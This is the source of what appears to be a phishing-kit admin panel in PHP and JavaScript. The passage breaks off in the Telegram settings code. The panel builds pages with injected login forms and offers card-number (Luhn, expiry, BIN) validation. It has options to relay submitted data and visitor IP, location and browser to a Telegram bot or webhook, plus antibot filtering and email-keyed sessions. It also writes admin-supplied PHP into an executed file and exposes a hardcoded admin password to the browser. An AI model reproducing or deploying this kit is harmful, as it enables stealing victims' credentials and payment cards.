<?php

/************************************************************
 * Ultra Admin — Class-Only Injection (FULL) — PART 1 (MOD)
 *
 * تعديلات أمنية وخفيفة:
 * - تحقق أقسام محفوظة مُحكَم
 * - استخدام LOCK_EX عند الكتابة إلى الملفات الحسّاسة
 * - فحص مسارات/أسماء الملفات قبل الحفظ أو الحذف
 * - إنشاء مجلد النسخ الاحتياطي إذا لم يكن موجوداً
 * - ردود JSON متسقة
 ************************************************************/

header('X-Content-Type-Options: nosniff');
header('Cache-Control: no-store, no-cache, must-revalidate');
date_default_timezone_set('Africa/Cairo');

/* ------------ PATHS / CONFIG --------- */
$SETTINGS_FILE   = __DIR__ . '/settings.json';
$BACKUP_DIR      = __DIR__ . '/backups';
$PAGES_DIR       = __DIR__ . '/';
$ADMIN_PASSWORD  = '0165625092'; // غيّره في الإنتاج

if (!is_dir($BACKUP_DIR)) {
    @mkdir($BACKUP_DIR, 0775, true);
    @chmod($BACKUP_DIR, 0775);
}

/* ------------------ UTIL --------------------------- */

function defaults_all(){
    $rand = substr(md5(mt_rand()),0,8);

    return [
        "telegram" => [ "bot_token" => "", "chat_id" => "" ],
        "forms" => [
            "login" => [
                "fields" => [
                    ["name"=>"username","label"=>"Username","type"=>"text","required"=>true,"placeholder"=>"Enter username","target_class"=>"username",
                     "min"=>"","max"=>"","digitsOnly"=>false,"pattern"=>"","error_msg"=>"","highlight_on_error"=>true,"use_luhn"=>false,
                     "alnum"=>false,"min_month"=>"","min_year_yy"=>"","min_date"=>"","js"=>"","css"=>"","focus"=>false],
                    ["name"=>"password","label"=>"Password","type"=>"password","required"=>true,"placeholder"=>"Enter password","target_class"=>"password",
                     "min"=>"","max"=>"","digitsOnly"=>false,"pattern"=>"","error_msg"=>"","highlight_on_error"=>true,"use_luhn"=>false,
                     "alnum"=>false,"min_month"=>"","min_year_yy"=>"","min_date"=>"","js"=>"","css"=>"","focus"=>false]
                ],
                "behavior" => [
                    "label"=>"Login","telegram"=>false,"redirect"=>"","alert"=>"","webhook"=>"","js"=>"",
                    "tg_template"=>"pipe","tg_meta"=>["ua"=>true,"time"=>true,"geo"=>false,"bin"=>false],
                    "tg_bin_field"=>"","tg_header"=>"|{form} {page} | #{tag}\n",
                    "button_class_target"=>"submit-btn",
                    "button_selector"=>""
                ]
            ]
        ],
        // مبدئياً كل صفحة فورم واحد فقط (منع التضارب)
        "pages" => [[ "display"=>"Home", "php"=>"page_{$rand}.php", "forms_on_page"=>["login"] ]],
        "antibot" => ["enabled_global"=>false,"apply_pages"=>[],"php_rules"=>"","js_rules"=>""],
        "aes"     => ["enabled"=>false,"key_lifetime_days"=>7],
        // Session defaults
        "session" => [
            "enabled" => false,
            "duration_minutes" => 60,
            "lock_ip" => true,
            "require_param_name" => "email",
            "redirect_url" => "index.php",
            "notify_new_visit" => false,
            "visit_template" => "🆕 New visit for {{email}}\n|SESSION    : #{{session_hash}}\n| + IP Info +\n|IP ADDRESS : {{ip}}\n|LOCATION   : {{location}}\n|BROWSER    : {{browser}}\n|TIME       : {{time_gmt}}"
        ],
        "__rev" => time()
    ];
}

function load_settings($file){
    if (!file_exists($file)) {
        $d = defaults_all();
        @file_put_contents($file, json_encode($d, JSON_PRETTY_PRINT|JSON_UNESCAPED_UNICODE), LOCK_EX);
        @chmod($file, 0644);
        return $d;
    }
    $raw = @file_get_contents($file);
    $d = $raw ? json_decode($raw, true) : [];
    if (!is_array($d)) $d = [];
    $def = defaults_all();
    foreach ($def as $k=>$v) if (!isset($d[$k])) $d[$k] = $v;
    if (!isset($d['__rev'])) $d['__rev'] = time();
    return $d;
}

function save_settings($file, $data){
    $json = json_encode($data, JSON_PRETTY_PRINT|JSON_UNESCAPED_UNICODE);
    if ($json === false) return false;
    $ok = @file_put_contents($file, $json, LOCK_EX);
    if ($ok === false) return false;
    @chmod($file, 0644);
    return true;
}

function backup_settings($file, $backup_dir){
    if(!file_exists($file)) return false;
    $dst = rtrim($backup_dir, '/').'/'."settings_".date('Ymd_His').".json";
    return @copy($file, $dst);
}

function sanitize_filename($s){ return preg_replace('/[^A-Za-z0-9_\-\.]+/','_', $s); }

/* Build antibot runtime files from settings (best-effort) */
function build_antibot_runtime_and_js($settings){
    $php_rules = isset($settings['antibot']['php_rules']) ? $settings['antibot']['php_rules'] : '';
    $php = "<?php\n".
           "/** Auto-generated AntiBot runtime **/\n".
           "if (!function_exists('ua_ab_runtime')) {\n".
           "  function ua_ab_runtime(){\n".
           "    try {\n".
           "      " . $php_rules . "\n".
           "    } catch (Throwable \$e) { /* swallow to avoid fatal */ }\n".
           "  }\n".
           "}\n".
           "try { ua_ab_runtime(); } catch (Throwable \$e) { /* swallow */ }\n";
    @file_put_contents(__DIR__.'/antibot_runtime.php', $php, LOCK_EX);
    @chmod(__DIR__.'/antibot_runtime.php', 0644);

    $js_rules = isset($settings['antibot']['js_rules']) ? $settings['antibot']['js_rules'] : '';
    $js  = "/** Auto-generated AntiBot client JS **/\n" . $js_rules;
    @file_put_contents(__DIR__.'/antibot.js', $js, LOCK_EX);
    @chmod(__DIR__.'/antibot.js', 0644);
}

/* ---- ensure settings.json exists ---- */
$_UA_ENSURE_SETTINGS = load_settings($SETTINGS_FILE);

/* ------------------ ASSET: admin.js --------------------- */

if (isset($_GET['asset']) && $_GET['asset'] === 'admin.js') {
    header('Content-Type: application/javascript; charset=utf-8');

    $ADMIN_PASSWORD_JS = json_encode($ADMIN_PASSWORD);

    $js = <<<'JS'
/* Admin — Pages Drag (hard replace) + Exact Page Index + Safe Edit/Retrofit + Sync + Fields/Behavior + Backups + AES + Session */

(function(){
  'use strict';

  var ADMIN_PASSWORD = __ADMIN_PASSWORD_PLACEHOLDER__;

  // ---------- helpers ----------
  function $(s){return document.querySelector(s)}
  function $all(s){return [].slice.call(document.querySelectorAll(s))}
  function get(id){return document.getElementById(id)}
  function toast(msg, cls){ try{ var el=document.createElement('div'); el.className='ua-toast '+(cls?('ua-'+cls):'ua-success'); el.textContent=msg; document.body.appendChild(el); setTimeout(function(){el.classList.add('show')},10); setTimeout(function(){el.classList.remove('show'); setTimeout(function(){el.remove()},260)},2600);}catch(e){console.log('[toast]',msg)} }
  function showLogin(){ get('login')?.classList.remove('ua-hide'); get('app')?.classList.add('ua-hide'); }
  function showApp(){ get('login')?.classList.add('ua-hide'); get('app')?.classList.remove('ua-hide'); }
  function j(url, method, body, headers){
    return fetch(url,{
      method:method||'GET',
      headers: headers || (body?{'Content-Type':'application/json'}:undefined),
      body: body ? (typeof body==='string'?body:JSON.stringify(body)) : undefined,
      cache:'no-store'
    });
  }
  function safeJson(url){ return j(url).then(r=>r.json()).catch(()=>({})); }

  // ---------- state ----------
  var SETTINGS=null, currentPageIndex=0, currentForm='';

  function loadSettings(){
    return safeJson('settings.json?'+Date.now()).then(function(s){
      SETTINGS = s||{};
      SETTINGS.forms    = SETTINGS.forms    || {};
      SETTINGS.pages    = Array.isArray(SETTINGS.pages)?SETTINGS.pages:[];
      SETTINGS.telegram = SETTINGS.telegram || {};
      SETTINGS.antibot  = SETTINGS.antibot  || {enabled_global:false,apply_pages:[],php_rules:'',js_rules:''};
      SETTINGS.aes      = SETTINGS.aes      || {enabled:false, key_lifetime_days:7};
      SETTINGS.session  = SETTINGS.session  || {enabled:false,duration_minutes:60,lock_ip:true,require_param_name:'email',redirect_url:'index.php',notify_new_visit:false,visit_template:"🆕 New visit for {{email}}\n|SESSION    : #{{session_hash}}\n| + IP Info +\n|IP ADDRESS : {{ip}}\n|LOCATION   : {{location}}\n|BROWSER    : {{browser}}\n|TIME       : {{time_gmt}}"};
      return SETTINGS;
    });
  }

  // حفظ الصفحات: استبدال كامل (hard replace) + مزامنة بعد الحفظ
  function savePagesHard(){
    // لو السيرفر بيدعم mode=replace هنستفيد، ولو لا فبرضه هنرسل المصفوفة كاملة فيستبدلها
    return j('admin.php?save_section=pages&mode=replace','POST', SETTINGS.pages||[])
      .then(()=>loadSettings())
      .then(function(newS){
        // مزامنة الحالة المحلية بعد الحفظ لمنع أي اختلاف
        SETTINGS.pages = Array.isArray(newS.pages)?newS.pages.slice():[];
      });
  }
  function saveSection(k,v){ return j('admin.php?save_section='+encodeURIComponent(k),'POST',v); }
  function saveForms(){ return saveSection('forms', SETTINGS.forms||{}); }
  function saveTelegram(){ return saveSection('telegram', SETTINGS.telegram||{}); }
  function saveAntibot(){ return saveSection('antibot', SETTINGS.antibot||{}); }
  function saveAES(){ return saveSection('aes', SETTINGS.aes||{}); }
  function saveSession(){ return saveSection('session', SETTINGS.session||{}); }

  // ---------- LOGIN ----------
  function bindLogin(){
    var btn=get('btnLogin'), pass=get('pass'), msg=get('msg');
    if(!btn||!pass) return false;
    function doLogin(){
      var p=(pass.value||'').trim();
      if(!p){ if(msg) msg.textContent='Enter password'; return; }
      if(p===ADMIN_PASSWORD){ localStorage.setItem('admin_ok','1'); if(msg) msg.textContent=''; afterLogin(); }
      else{ if(msg) msg.textContent='Wrong password'; pass.value=''; }
    }
    btn.addEventListener('click', doLogin);
    pass.addEventListener('keydown', function(e){ if(e.key==='Enter') doLogin(); });
    return true;
  }

  // ---------- PAGES (Drag + actions) ----------
  function setCurrentPage(i){
    currentPageIndex = Math.max(0, Math.min(i, (SETTINGS.pages||[]).length-1));
    renderPageEditor();
    renderPagePreview();
  }

  function buildPagesList(){
    var host=get('pagesList'); if(!host) return; host.innerHTML='';
    (SETTINGS.pages||[]).forEach(function(p,i){
      var item=document.createElement('div');
      item.className='ua-item d-flex justify-content-between align-items-center';
      item.innerHTML =
        '<div class="d-flex align-items-center gap-2">'+
          '<span class="grip" title="Drag to reorder"><i class="fa fa-grip-vertical"></i></span>'+
          '<span>'+ (p.display||('Page '+(i+1))) +'</span>'+
          '<span class="badge">'+ (p.php||'') +'</span>'+
        '</div>'+
        '<div class="d-flex gap-2">'+
          '<button class="btn btn-sm btn-outline-secondary" data-act="open" title="Open"><i class="fa fa-up-right-from-square"></i></button>'+
          '<button class="btn btn-sm btn-outline-primary" data-act="edit" title="Edit file"><i class="fa fa-pen-to-square"></i></button>'+
          '<button class="btn btn-sm btn-outline-info" data-act="retro" title="Retrofit"><i class="fa fa-screwdriver-wrench"></i></button>'+
          '<button class="btn btn-sm btn-outline-danger" data-act="del" title="Delete"><i class="fa fa-trash"></i></button>'+
        '</div>';

      item.addEventListener('click', function(e){
        var btn = e.target.closest('button');
        if(btn){
          var act = btn.getAttribute('data-act');
          // ثبّت الصفحة الحالية قبل أي أكشن علشان مايحصلش خلط
          setCurrentPage(i);
          var pg = SETTINGS.pages[currentPageIndex];

          if(act==='del'){
            if(!confirm('Delete this page?')) return;
            var fd=new FormData(); fd.append('index', currentPageIndex);
            fetch('admin.php?delete_page=1',{method:'POST',body:fd})
              .then(()=>loadSettings())
              .then(function(){
                toast('Deleted','warning');
                // اضبط المؤشر بعد الحذف
                if(currentPageIndex >= (SETTINGS.pages||[]).length){ currentPageIndex = Math.max(0,(SETTINGS.pages||[]).length-1); }
                buildPagesList(); renderPageEditor(); renderPagePreview();
              });
            return;
          }

          if(act==='open'){
            if(pg && pg.php) window.open(pg.php,'_blank');
            return;
          }

          if(act==='edit'){
            if(!pg || !pg.php) { toast('No file','danger'); return; }
            fetch(pg.php+'?'+Date.now()).then(r=>r.text()).then(function(code){
              var t=get('pageFileEditor'); if(t) t.value=code||'';
              var lbl=get('fileNameLabel'); if(lbl) lbl.textContent = pg.php||'';
              if (window.bootstrap && get('modalEditor')) new bootstrap.Modal('#modalEditor').show();
            });
            return;
          }

          if(act==='retro'){
            if(!pg || !pg.php) { toast('No file','danger'); return; }
            var fd=new FormData();
            fd.append('filename', pg.php);
            fd.append('index', String(currentPageIndex)); // لتثبيت الصفحة المقصودة في السيرفر إن لزم
            fetch('admin.php?retrofit_page=1',{method:'POST',body:fd})
              .then(r=>r.json()).then(function(x){
                toast(x&&x.ok?'Retrofit done':'Failed', x&&x.ok?'success':'danger');
                renderPagePreview();
              });
            return;
          }

          return;
        }
        // Click على العنصر نفسه = تحديد الصفحة
        setCurrentPage(i);
      });

      host.appendChild(item);
    });

    // سحب/إفلات - استبدال كامل ثم مزامنة
    if(window.Sortable && host.children.length){
      new Sortable(host,{
        handle:'.grip',
        animation:150,
        onEnd:function(e){
          if(e.oldIndex===e.newIndex) return;
          var moved = SETTINGS.pages.splice(e.oldIndex,1)[0];
          SETTINGS.pages.splice(e.newIndex,0,moved);
          // ثبت المؤشر على الموضع الجديد
          currentPageIndex = e.newIndex;
          savePagesHard().then(function(){
            buildPagesList();
            renderPageEditor(); renderPagePreview();
            toast('Order saved');
          });
        }
      });
    }
  }

  function renderPageEditor(){
    var pg=(SETTINGS.pages||[])[currentPageIndex];
    var fileBadge=get('curFile'); if(fileBadge) fileBadge.textContent= pg ? (pg.php||'') : '—';
    var pt=get('pageTitle');
    if(!pg){
      if(pt) pt.value='';
      var ed=get('formsOnPage');
      if(ed) ed.innerHTML='<div class="mini text-muted">No page selected.</div>';
      renderPagePreview();
      return;
    }
    if(pt){
      pt.value = pg.display||'';
      pt.onchange = function(e){
        SETTINGS.pages[currentPageIndex].display = (e.target.value||'').trim();
        savePagesHard().then(function(){ buildPagesList(); });
      };
    }

    // Form واحد فقط لكل صفحة (قائمة منسدلة)
    var host=get('formsOnPage'); if(!host) return;
    host.innerHTML='';
    var allForms = Object.keys(SETTINGS.forms||[]);
    host.innerHTML =
      '<label class="form-label mini fw-bold">Form on this page</label>'+
      '<select id="pg_form_single" class="form-select"></select>';

    var sel=get('pg_form_single');
    var current = (pg.forms_on_page && pg.forms_on_page[0]) ? pg.forms_on_page[0] : '';
    sel.innerHTML = '<option value="">(None)</option>' + allForms.map(function(f){
      var s = (f===current)?' selected':'';
      return '<option value="'+f+'"'+s+'>'+f+'</option>';
    }).join('');

    sel.addEventListener('change', function(){
      var chosen = (this.value||'').trim();
      pg.forms_on_page = chosen ? [chosen] : [];
      SETTINGS.pages[currentPageIndex] = pg;
      savePagesHard().then(function(){
        currentForm = chosen || '';
        if (currentForm) renderFormEditor();
        renderPagePreview();
        toast('Page form set');
      });
    });

    // حدّث قائمة redirect من الصفحات
    var redirectSel = get('bh_redirect');
    if (redirectSel) {
      var opts = '<option value="">(None)</option>';
      (SETTINGS.pages||[]).forEach(function(p){ opts += '<option value="'+(p.php||'')+'">'+(p.display||p.php)+'</option>'; });
      redirectSel.innerHTML = opts;
    }

    // اضبط currentForm لعرض المحرر
    currentForm = current || currentForm || (allForms[0]||'');
  }

  function renderPagePreview(){
    var pv=get('pagePreview'); if(!pv) return; pv.innerHTML='';
    var pg=(SETTINGS.pages||[])[currentPageIndex]; if(!pg) return;
    var iframe=document.createElement('iframe'); iframe.className='ua-preview';
    iframe.src=(pg.php||'') + ((pg.php||'').indexOf('?')>-1?'&':'?') + 'pv='+Date.now();
    pv.appendChild(iframe);
    var a=get('openPageLinkTop'); if(a) a.href=pg.php||'#';
  }

  // ---------- FORMS LIST ----------
  function buildFormsList(){
    var host=get('formsList'); if(!host) return; host.innerHTML='';
    Object.keys(SETTINGS.forms||{}).forEach(function(n){
      var a=document.createElement('a');
      a.href='javascript:void(0)';
      a.className='ua-item d-flex justify-content-between align-items-center';
      a.innerHTML='<span><i class="fa fa-clipboard-list me-2"></i>'+n+'</span><i class="fa fa-angle-right text-muted"></i>';
      a.addEventListener('click', function(){ currentForm=n; renderFormEditor(); });
      host.appendChild(a);
    });
  }

  // ---------- Field Property Modal ----------
  function openFieldModal(existing, idx){
    var el = get('modalField'); var m = bootstrap.Modal.getOrCreateInstance(el);
    get('mf_name') && (get('mf_name').value     = (existing && existing.name) || '');
    get('mf_label') && (get('mf_label').value    = (existing && existing.label) || '');
    get('mf_type') && (get('mf_type').value     = (existing && existing.type) || 'text');
    get('mf_placeholder') && (get('mf_placeholder').value = (existing && existing.placeholder) || '');
    get('mf_required') && (get('mf_required').checked  = !!(existing && existing.required));
    get('mf_target') && (get('mf_target').value   = (existing && existing.target_class) || '');
    get('mf_min') && (get('mf_min').value      = (existing && existing.min) || '');
    get('mf_max') && (get('mf_max').value      = (existing && existing.max) || '');
    get('mf_digits') && (get('mf_digits').checked = !!(existing && existing.digitsOnly));
    get('mf_alnum') && (get('mf_alnum').checked  = !!(existing && existing.alnum));
    get('mf_pattern') && (get('mf_pattern').value  = (existing && existing.pattern) || '');
    get('mf_err') && (get('mf_err').value      = (existing && existing.error_msg) || '');
    get('mf_high') && (get('mf_high').checked   = !(existing && existing.highlight_on_error===false));
    get('mf_luhn') && (get('mf_luhn').checked   = !!(existing && existing.use_luhn));
    get('mf_min_month') && (get('mf_min_month').value   = (existing && existing.min_month) || '');
    get('mf_min_year_yy') && (get('mf_min_year_yy').value = (existing && existing.min_year_yy) || '');
    get('mf_min_date') && (get('mf_min_date').value    = (existing && existing.min_date) || '');
    get('mf_js') && (get('mf_js').value       = (existing && existing.js) || '');
    get('mf_css') && (get('mf_css').value      = (existing && existing.css) || '');
    if (get('mf_focus')) get('mf_focus').checked = !!(existing && existing.focus);
    el.__idx = (typeof idx==='number')?idx:null;
    m.show();
  }
  function modalToField(){
    return {
      name: (get('mf_name')?.value||'').trim(),
      label: (get('mf_label')?.value||'').trim(),
      type: get('mf_type')?.value || 'text',
      placeholder: (get('mf_placeholder')?.value||'').trim(),
      required: !!get('mf_required')?.checked,
      target_class: (get('mf_target')?.value||'').trim(),
      min: (get('mf_min')?.value||'').trim(),
      max: (get('mf_max')?.value||'').trim(),
      digitsOnly: !!get('mf_digits')?.checked,
      alnum: !!get('mf_alnum')?.checked,
      pattern: (get('mf_pattern')?.value||'').trim(),
      error_msg: get('mf_err')?.value || '',
      highlight_on_error: !!get('mf_high')?.checked,
      use_luhn: !!get('mf_luhn')?.checked,
      min_month: (get('mf_min_month')?.value||'').trim(),
      min_year_yy: (get('mf_min_year_yy')?.value||'').trim(),
      min_date: (get('mf_min_date')?.value||'').trim(),
      js: get('mf_js')?.value || '',
      css: get('mf_css')?.value || '',
      focus: !!get('mf_focus')?.checked
    };
  }

  // ---------- Field Code Modal ----------
  function openFieldCodeModal(rowEl, type){
    var modalEl = get('modalFieldCode'); if(!modalEl) return;
    var modal = bootstrap.Modal.getOrCreateInstance(modalEl);
    var name = rowEl.querySelector('.f-name') ? rowEl.querySelector('.f-name').value : '';
    var jsTa  = rowEl.querySelector('.f-js');
    var cssTa = rowEl.querySelector('.f-css');
    var ed    = get('fcEditor');
    var lblT  = get('fcType');
    var lblN  = get('fcFieldName');

    if (lblN) lblN.textContent = name || '(unnamed)';
    if (lblT) lblT.textContent = (type==='css'?'CSS':'JS');
    if (ed) ed.value = (type==='css' ? (cssTa?cssTa.value:'') : (jsTa?jsTa.value:''));

    modalEl.__row  = rowEl;
    modalEl.__type = type;

    if (get('fcSwitchJS')) get('fcSwitchJS').className  = 'btn btn-sm '+(type==='js'?'btn-primary':'btn-outline-primary');
    if (get('fcSwitchCSS')) get('fcSwitchCSS').className = 'btn btn-sm '+(type==='css'?'btn-secondary':'btn-outline-secondary');

    modal.show();
  }
  function wireFieldCodeModalOnce(){
    var modalEl = get('modalFieldCode'); if(!modalEl || modalEl.__wired) return;
    modalEl.__wired = true;
    var btnJS  = get('fcSwitchJS');
    var btnCSS = get('fcSwitchCSS');
    var edt    = get('fcEditor');
    var typeLbl= get('fcType');

    btnJS && btnJS.addEventListener('click', function(){
      if(!modalEl.__row) return;
      var jsTa  = modalEl.__row.querySelector('.f-js');
      if (edt) edt.value = jsTa?jsTa.value:'';
      if (typeLbl) typeLbl.textContent='JS';
      modalEl.__type = 'js';
      btnJS.className='btn btn-sm btn-primary';
      if(btnCSS) btnCSS.className='btn btn-sm btn-outline-secondary';
    });
    btnCSS && btnCSS.addEventListener('click', function(){
      if(!modalEl.__row) return;
      var cssTa  = modalEl.__row.querySelector('.f-css');
      if (edt) edt.value = cssTa?cssTa.value:'';
      if (typeLbl) typeLbl.textContent='CSS';
      modalEl.__type = 'css';
      btnCSS.className='btn btn-sm btn-secondary';
      if(btnJS) btnJS.className='btn btn-sm btn-outline-primary';
    });
    get('fcSave') && get('fcSave').addEventListener('click', function(){
      if(!modalEl.__row) return;
      var type  = modalEl.__type || 'js';
      var jsTa  = modalEl.__row.querySelector('.f-js');
      var cssTa = modalEl.__row.querySelector('.f-css');
      var val   = (get('fcEditor')?.value||'');
      if(type==='css' && cssTa){ cssTa.value = val; }
      else if(jsTa){ jsTa.value = val; }
      bootstrap.Modal.getInstance(modalEl)?.hide();
    });
  }

  // ---------- Render form editor ----------
  function renderFormEditor(){
    wireFieldCodeModalOnce();
    var cf=get('curForm'); if(cf) cf.textContent = currentForm || '—';
    var obj=(SETTINGS.forms||{})[currentForm] || null;
    var tbody=$('#fieldsTable tbody'); if(!tbody) return;
    if(!obj){ tbody.innerHTML=''; return; }

    (function fillAndBindBehavior(){
      obj.behavior = obj.behavior || {};
      var b = obj.behavior;

      var bh_label      = get('bh_label');
      var bh_alert      = get('bh_alert');
      var bh_webhook    = get('bh_webhook');
      var bh_redirect   = get('bh_redirect');
      var bh_js         = get('bh_js');
      var bh_btn_pick   = get('bh_btn_pick');
      var bh_telegram   = get('bh_telegram');

      var tg_tpl_pipe   = get('tg_tpl_pipe');
      var tg_tpl_pretty = get('tg_tpl_pretty');

      var tg_meta_ua    = get('tg_meta_ua');
      var tg_meta_time  = get('tg_meta_time');
      var tg_meta_geo   = get('tg_meta_geo');
      var tg_meta_bin   = get('tg_meta_bin');

      var tg_bin_field  = get('tg_bin_field');
      var tg_header     = get('tg_header');

      if (bh_redirect){
        var opts = '<option value="">(None)</option>';
        (SETTINGS.pages||[]).forEach(function(p){ opts += '<option value="'+(p.php||'')+'">'+(p.display||p.php)+'</option>'; });
        bh_redirect.innerHTML = opts;
      }

      if (bh_label)     bh_label.value     = b.label || 'Submit';
      if (bh_alert)     bh_alert.value     = b.alert || '';
      if (bh_webhook)   bh_webhook.value   = b.webhook || '';
      if (bh_js)        bh_js.value        = b.js || '';
      if (bh_redirect)  bh_redirect.value  = b.redirect || '';
      if (bh_telegram)  bh_telegram.checked= !!b.telegram;

      var tpl = b.tg_template || 'pipe';
      if (tg_tpl_pipe)   tg_tpl_pipe.checked   = (tpl === 'pipe');
      if (tg_tpl_pretty) tg_tpl_pretty.checked = (tpl === 'pretty');

      var meta = b.tg_meta || {ua:true,time:true,geo:false,bin:false};
      if (tg_meta_ua)   tg_meta_ua.checked   = !!meta.ua;
      if (tg_meta_time) tg_meta_time.checked = !!meta.time;
      if (tg_meta_geo)  tg_meta_geo.checked  = !!meta.geo;
      if (tg_meta_bin)  tg_meta_bin.checked  = !!meta.bin;

      if (tg_bin_field) tg_bin_field.value = b.tg_bin_field || '';
      if (tg_header)    tg_header.value    = b.tg_header    || '|{form} {page} | #{tag}\n';

      function onInput(el, fn){ if(!el) return; el.addEventListener('input', function(){ fn(el.value); }); el.addEventListener('change', function(){ fn(el.value); }); }
      function onCheck(el, fn){ if(!el) return; el.addEventListener('change', function(){ fn(!!el.checked); }); }
      function onRadio(el, fn){ if(!el) return; el.addEventListener('change', function(){ if(el.checked){ fn(); } }); }

      onInput(bh_label,     function(v){ b.label = (v||'').trim(); });
      onInput(bh_alert,     function(v){ b.alert = v; });
      onInput(bh_webhook,   function(v){ b.webhook = (v||'').trim(); });
      onInput(bh_js,        function(v){ b.js = v; });
      onInput(bh_redirect,  function(v){ b.redirect = v; });
      onCheck(bh_telegram,  function(v){ b.telegram = v; });
      onRadio(tg_tpl_pipe,   function(){ b.tg_template = 'pipe'; });
      onRadio(tg_tpl_pretty, function(){ b.tg_template = 'pretty'; });
      onCheck(tg_meta_ua,    function(v){ b.tg_meta = b.tg_meta || {}; b.tg_meta.ua   = v; });
      onCheck(tg_meta_time,  function(v){ b.tg_meta = b.tg_meta || {}; b.tg_meta.time = v; });
      onCheck(tg_meta_geo,   function(v){ b.tg_meta = b.tg_meta || {}; b.tg_meta.geo  = v; });
      onCheck(tg_meta_bin,   function(v){ b.tg_meta = b.tg_meta || {}; b.tg_meta.bin  = v; });
      onInput(tg_bin_field,  function(v){ b.tg_bin_field = (v||'').trim(); });
      onInput(tg_header,     function(v){ b.tg_header    = v; });

      if (bh_btn_pick){
        bh_btn_pick.addEventListener('click', function(){
          var selInput = get('pbSelector');
          if (selInput) selInput.value = (b.button_selector||'') || (b.button_class_target?('.'+b.button_class_target):'');
          var mEl = get('modalPickButton');
          if (mEl) {
            var m = bootstrap.Modal.getOrCreateInstance(mEl);
            m.show();
            get('pbSave')?.addEventListener('click', function(){
              var val = (selInput?.value||'').trim();
              b.button_selector = val;
              bootstrap.Modal.getInstance(mEl)?.hide();
            }, {once:true});
          } else {
            var val = prompt('Button CSS selector (e.g. .submit-btn or form button[type=submit])', (b.button_selector||'') || (b.button_class_target?('.'+b.button_class_target):''));
            if (val!=null) b.button_selector = val.trim();
          }
        });
      }

      obj.behavior = b;
    })();

    var tbody=$('#fieldsTable tbody'); tbody.innerHTML='';
    (obj.fields||[]).forEach(function(f, idx){
      var tr=document.createElement('tr');
      tr.dataset.idx = String(idx);
      tr.innerHTML =
        '<td class="text-muted"><i class="fa fa-grip-vertical"></i></td>'+
        '<td><input class="form-control form-control-sm f-name" value="'+(f.name||'')+'" readonly></td>'+
        '<td><input class="form-control form-control-sm f-label" value="'+(f.label||'')+'" readonly></td>'+
        '<td><span class="badge bg-light text-dark">'+(f.type||'text')+'</span></td>'+
        '<td><code>'+(f.target_class||'')+'</code></td>'+
        '<td class="text-center">'+(f.required?'<i class="fa fa-check text-success"></i>':'<i class="fa fa-minus text-muted"></i>')+'</td>'+
        '<td><button type="button" class="btn btn-sm btn-outline-secondary btn-edit-field">Edit</button></td>'+
        '<td><button type="button" class="btn btn-sm btn-outline-primary btn-edit-js">JS</button><textarea class="f-js d-none">'+(f.js||'')+'</textarea></td>'+
        '<td><button type="button" class="btn btn-sm btn-outline-dark btn-edit-css">CSS</button><textarea class="f-css d-none">'+(f.css||'')+'</textarea></td>'+
        '<td><button class="btn btn-sm btn-outline-danger"><i class="fa fa-trash"></i></button></td>';
      tr.querySelector('.btn-outline-danger').addEventListener('click', function(){ obj.fields.splice(idx,1); SETTINGS.forms[currentForm]=obj; saveForms().then(renderFormEditor); });
      tr.querySelector('.btn-edit-js').addEventListener('click', function(){ openFieldCodeModal(tr,'js'); });
      tr.querySelector('.btn-edit-css').addEventListener('click', function(){ openFieldCodeModal(tr,'css'); });
      tr.querySelector('.btn-edit-field').addEventListener('click', function(){ openFieldModal(f, idx); });
      tbody.appendChild(tr);
    });

    if(window.Sortable){
      new Sortable(tbody, {
        handle:'.fa-grip-vertical',
        animation:150,
        onEnd:function(){
          var original = (obj.fields||[]).slice();
          var order = $all('#fieldsTable tbody tr').map(function(tr){
            return parseInt(tr.dataset.idx,10);
          }).filter(function(n){ return !isNaN(n); });
          obj.fields = order.map(function(i){ return original[i]; });
          SETTINGS.forms[currentForm]=obj;
          saveForms().then(function(){ toast('Fields order saved'); renderFormEditor(); });
        }
      });
    }
  }

  // ---------- FORMS buttons ----------
  function wireFormsButtons(){
    get('btnNewForm')?.addEventListener('click', function(){
      var name=prompt('Form name:','form1'); if(!name) return;
      var fd=new FormData(); fd.append('name', name);
      fetch('admin.php?forms_ops=create', {method:'POST', body:fd})
        .then(r=>r.json())
        .then(function(x){ if(!x||!x.ok){ toast((x&&x.err)||'Error','danger'); return; }
          return loadSettings().then(function(){ currentForm=name; buildFormsList(); renderFormEditor(); toast('Form created'); });
        });
    });
    get('btnRenameForm')?.addEventListener('click', function(){
      if(!currentForm){ toast('Select a form','warning'); return; }
      var nn=prompt('New form name:', currentForm); if(!nn || nn===currentForm) return;
      var fd=new FormData(); fd.append('old', currentForm); fd.append('new', nn);
      fetch('admin.php?forms_ops=rename', {method:'POST', body:fd})
        .then(r=>r.json()).then(function(x){ if(!x||!x.ok){ toast((x&&x.err)||'Error','danger'); return; }
          return loadSettings().then(function(){ currentForm=nn; buildFormsList(); renderFormEditor(); toast('Form renamed'); });
        });
    });
    get('btnDeleteForm')?.addEventListener('click', function(){
      if(!currentForm){ toast('Select a form','warning'); return; }
      if(!confirm('Delete this form?')) return;
      var fd=new FormData(); fd.append('name', currentForm);
      fetch('admin.php?forms_ops=delete', {method:'POST', body:fd})
        .then(r=>r.json()).then(function(x){ if(!x||!x.ok){ toast((x&&x.err)||'Error','danger'); return; }
          return loadSettings().then(function(){
            currentForm=Object.keys(SETTINGS.forms||{})[0]||'';
            buildFormsList(); renderFormEditor(); toast('Form deleted','warning');
          });
        });
    });
    get('btnAddField')?.addEventListener('click', function(){
      if(!currentForm){ toast('Select a form','warning'); return; }
      openFieldModal(null, null);
    });
    get('btnSaveForm')?.addEventListener('click', function(){
      var obj=SETTINGS.forms[currentForm]; if(!obj) return;
      SETTINGS.forms[currentForm] = obj;
      saveForms().then(function(){ toast('Form saved'); renderPagePreview(); });
    });
    get('mfSave')?.addEventListener('click', function(){
      if(!currentForm){ toast('Select a form','warning'); return; }
      var obj=SETTINGS.forms[currentForm]; obj.fields=obj.fields||[];
      var el = get('modalField'); var idx=el.__idx;
      var f = modalToField();
      if(idx===null || typeof idx!=='number'){ obj.fields.push(f); }
      else{ obj.fields[idx]=f; }
      SETTINGS.forms[currentForm]=obj;
      saveForms().then(function(){ bootstrap.Modal.getInstance(el)?.hide(); renderFormEditor(); toast(idx!=null?'Field updated':'Field added'); });
    });
  }

  // ---------- TELEGRAM ----------
  function renderTelegram(){ get('tg_token') && (get('tg_token').value=(SETTINGS.telegram&&SETTINGS.telegram.bot_token)||''); get('tg_chat') && (get('tg_chat').value=(SETTINGS.telegram&&SETTINGS.telegram.chat_id)||''); }
  function wireTelegram(){
    get('btnSaveTelegram')?.addEventListener('click', function(){
